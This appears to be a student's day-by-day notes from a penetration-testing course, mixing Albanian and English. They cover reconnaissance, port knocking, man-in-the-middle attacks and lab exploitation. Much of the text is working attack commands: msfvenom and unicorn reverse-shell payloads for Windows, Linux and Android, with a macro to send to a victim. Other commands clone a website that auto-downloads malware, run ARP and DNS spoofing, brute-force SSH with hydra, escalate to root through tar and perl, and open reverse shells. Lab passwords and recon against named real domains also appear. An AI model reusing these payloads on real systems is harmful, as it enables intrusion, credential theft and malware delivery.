25.06.2018, module Day 1
host?
ip?
mac?
protocol? a set of rules qe e definon punen,
applications: ftp, ssh, dns, ssh, snmp, ldap, http, https, rdp, pop, smtp, ntp
tcp? secure, connection oriented
udp? known as streaming protocol, connection less,
layer security - defenc in depth
dns spoofing: redirect technice and arp &ssl strip technice
session hijacking: nese se ke config mire web serverin cookies and sessions
big mac attack or
rough AP --
pineapple wifi -- jepet prej hackfive, bon mitm,
thc -- thc.oil, tools per rough ap, hydra, thc-ssl-dos attacks,
hell, dark web
1337 zero day web
defcon.org, tool qe perdoren mrena conf
stegano grafia
wight space attack, snow, steghigh
carbon black
kiosk mode (nLinux)
deceptive technology
pop, good per brute force
green threadings
ntp:
promiscuous mode: Allows a NIC to receive all traffic on the network, even if it is not addressed to this NIC
surf this platform
setoolkit: platform that has tool to clone a website
nmap UDP scan
filnename.py
import os
os.
##########################################################################################
27.06.2018, module Day 2
github,
me search ne github
db ku dev, hackers fix a problem in their way and share it with othser
chck for exploit, teknik, ide se qysh e kan fiz te tjeret nje problem
github account
git - idhet prems nje url
unicorn
.# git clone https://github.com/trustedsec/unicorn.git (url marr nga github).
.# cd unicorn/
.# python unicorn.py --help
.# python unicorn.py windown/meterpreter/reverse_tcp 172.16.60.84 4455 (i gjeneron powershell_attack.txt, unicorn.rc)
.# msfconsole -r unicorn.rc (e aktivizon multi handler me ngu ne port te cakuar)
copy paste to victim
codin qe ndodhet ne powershell_attack.txt e ekzekuton nga ndonje powershell apo cmd e nja windowsi.
ky kod mund dhe duhet perdour imagjinaten se si me bo dikan me executu.
psh
.# python -m SimpleHTTPServer 80 (e publikon qat file dhe manualisht e executon
.-----------------------------------------------------------------------------------------------------------------------------------------------------
*embedded macro*
root@kali:/cyber/macro# python unicorn.py windows/meterpreter/reverse_tcp 172.16.60.84 4455 macro
codin qe ndodhet ne powershell_attack.txt e embed ne macro te word psh
dhe ja dergon viktimes
# msfconsole -r unicorn.rc (e aktivizon multi handler me ngu ne port te cakuar)
.-----------------------------------------------------------------------------------------------------------------------------------------------------
root@kali:/PythonEmpire/Empire# pip install iptools (nese mungon
root@kali:/PythonEmpire/Empire# pip install netifaces (nese mungon
root@kali:/PythonEmpire/Empire/setup# ./install.sh
root@kali:/PythonEmpire/Empire# ./empire ( me hap
(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
(Empire: listeners/http) > set Host 172.16.60.84
(Empire: listeners/http) > execute
(Empire: listeners/http) > back
(Empire: listeners/http) > use stage
CVE nitre
Bloodhound
root@kali:/cyber/# apt-get install bloodhound
.# neo4j console --to open
root@kali:/cyber# pip install bloodhound
munesh mi fshi kta folldera Sami
C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell
ose me rrit sigurine per mos me ekzekutu scripta t ndryshme
https://github.com/eapowertools/ReactivateUsers/wiki/Changing-Execution-Signing-Policy-in-Powershell
https://github.com/eapowertools/ReactivateUsers/wiki/Changing-Execution-Signing-Policy-in-Powershell
.##########################################################################################
29.06.2018, module Day 3
iceberg, app sec, net sec,
port knocking, security ne port level,
initail proccess: 1. secquen numbers, 2. porta hapet me nje kohe te caktuar
Target:
ICEBERG: 172.16.60.65
http://172.16.60.65/
chat()
logdata()
GET /s4bryfeyzUll4hu.log
cat s4bryfeyzUll4hu.log | grep "USER" | cut -d " " -f 28 | sort -u
user : c89udwh
pass : AwSg6UVrnk%SW==
##########################################################################################
02.07.2018, module Day 4
install a tftp server ( see write up)
*theHarvester*
git clone https://github.com/laramies/theHarvester.git (to download
cd theHarvester
python theHarvester.py -d ickosovo.com -b google
python theHarvester.py -d ickosovo.com -b google -l 400
*Metagoofil*
git clone https://github.com/laramies/metagoofil.git
cd metagoofil
python metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
*dnsrecon*
-d (domain
-r (range
dnsrecon -d teb-kos.com
dnsrecon -r 91.187.97.144/28
*dnscan*
cd dnscan
python dnscan.py -d teb-kos.com
bypass cludflare:
-me i cut old databases (mafia cloud i ka history nga xx ne cluld flare
-cpanel e pingon ta kthen IP
-gjat krijimit e gabon IP e vet me te host
-brootforce
*subdomain list*
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3
python sublist3r.py -d name.com -t 3 -e bing
python sublist3r.py -d name.com -t 3 -e google
python sublist3r.py -d name.com -t 3 -e yahoo
site:"ickosovo" file:"jpeg"
inurl:"index.php"
intext:"rraci"
.##########################################################################################
04.07.2018, module Day 5
.##########################################################################################
06.07.2018, module Day 6
target: remote.com
mi gjet email, domain, sub domains, IP address pa cloudProtection etj
python theHarvester.py -d remote.com -b bing -l 400 (.py skripta duher shkarkuar paraprakisht)
theharvester -d remote.com -l 500 -b google
theharvester -d remote.com -l 500 -b all
dnsenum remote.com
dig remote.com
host remote.com
dnsrecon -d remote.com
bypass cloudflare, websploit
.##########################################################################################
09.07.2018, module4 Day 7
https://www.digitalocean.com/community --VPS solution
https://www.digitalocean.com/community/questions/how-to-config-port-knocking-on-csf-and-access-it-by-linux
**PORT KNOCKING**
https://download.configserver.com/csf.tgz
install knocked
cd /etc/csf/
nano csf.conf
TCPIN = "22" --direct access only 22
PORTKNOCKING = "80;TCP;30;1000;1001;1002;1003" --to allow knocking for port 80 with seq.
csf -r --to restart
*change default port 22 to 65500*
vi /etc/apache2/ports.conf
80 -> 65500
service apache2 restart
*new port 65000 me bo me port knocking*
.##########################################################################################
11.07.2018, module4 Day 8
DNSENUM
DNSRECON
ARCHIVE.ORG
metagufil
theharvester
whois
ickosovo.com
info gethering
part1 - summary
part2 - info per secilen tool dhe infot e nxerrne
part3 - permbyllja
.##########################################################################################
13.07.2018, module4 Day 9
missed
.##########################################################################################
16.07.2018, module4 Day 10
https://www.hak5.org/
alfa network card
hsps
MITM-ARP-spoofing
driftnet --tenton capture images with http links
dnsspoof --
arpspoof --qon probe request (to ack like gw)
ettercap --packet capture tool ??
urlsnarf --i dump url captcured
zANTI --per redirect requests
ARP?
sniffing
poisoning
vector of attack,
------------------------------------------------------------------------------------------
**MITM man in the middle**
echo 1 > /proc/sys/net/ipv4/ip_forward --enable IP forwarding (/proc)
.60.79 win7 viktima
.60.72 kali hacker machine
.60.1 original Gateway
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79
inicon nga viktima traffic
ettercap -T -q -i eth0
----------------------------------------------------------------------------------------
**dnsspoofing**
nano host.txt
172.16.60.72 www*
172.16.60.72 ickosovo.com
arpspoof -i eth0 -t 172.16.60.79 172.16.60.1
arpspoof -i eth0 -t 172.16.60.1 172.16.60.79
dnsspoof -i eth0 -f host.txt
--------------------------------------------------------------------------------------
**me clone nje web using set toolkit** ( web exportetohet ne /root/.set/web-clone)
index.html e zhvendos ne /var/www/html
ne /var/www/html e generon nje malware .exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.79 LPORT=5560 -f exe -o test-update.exe
edito index.html -- add:
service apache2 start
http://ip e apache2/index.html (qelet web dhe file fillon mu download)
.##########################################################################################
18.07.2018, module4 Day 11
Stage1
build malware, upload in fake web, auto download OS base
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 -f elf -o test-update.elf
msfvenom -p Android/meterpreter/reverse_tcp LHOST=172.16.60.72 LPORT=5560 R>test-update.apk
------------------------------------------------------------
msf
set
mitm
.##########################################################################################
20.07.2018, module4 Day 12
target 1
172.16.60.72
user:ick
target2
172.16.60.69, portknocking, ssh 1000 5000 9000
nmap -sV 172.16.60.69
ORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.27 ((Ubuntu))
MAC Address: 00:DB:DF:54:18:07 (Intel Corporate)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------
dirb http://172.16.60.72 --directory
hydra -l ick -P /root/Desktop/rockyou.txt 172.16.60.72 ssh --brute force
sudo -u root tar cf /dev/null /temp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash --te jep root access
#nc -z 172.16.60.69 100 5000 9000
#ssh arben@172.16.60.69
#arben@172.16.60.69's password:arben1!1
$ :)
next step village escalation
$ sudo -l --found (ALL) NOPASSWD: /usr/bin/perl
sudo -u root
root@kali:/# nc -lvp 80 --e hap nje port
$ sudo perl rv1.pl --perl reverse shell found in github
edito: ip e machine tane edhe porten qe e ke bo ne ngu me nc -lvp 80 psh